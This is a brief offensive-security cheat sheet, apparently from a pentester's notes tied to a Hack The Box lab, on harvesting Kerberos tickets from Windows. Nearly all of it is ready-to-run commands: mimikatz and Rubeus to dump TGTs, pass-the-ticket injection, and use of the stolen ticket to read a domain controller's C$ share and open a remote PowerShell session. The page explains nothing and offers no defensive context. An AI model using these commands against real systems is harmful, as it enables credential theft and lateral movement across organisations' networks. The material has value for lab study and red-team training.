githubEdit

kerberos-ticket-from-windows

Harvesting (TGT) Kerberos Tickets from windows

Mimikatz

mimikatz.exe "Sekurlsa::tickets /export" exit

Rubeus.exe

Rubeus.exe dump /nowrap

Pass the ticket

Rubeus

Rubeus.exe ptt /ticket:file_name.kirbi
Rubeus.exe ptt /ticket:<base64_ticket>
type \\DC01.inlanefreight.htb\C$\john\john.txt

Mimikatz

mimikatz.exe "kerberos:ptt file_path.kirb i" exit
dir \\DC01.inlanefreight.htb\c$

Pass the ticket (connect remotely)

mimikatz.exe "kerberos:ptt file_path.kirbi" exit
powershell -c 'Enter-PSSession -ComputerName DC01'

Create a sacrificial process

  • In the new windows (pass-the-ticket lateral movement)

Last updated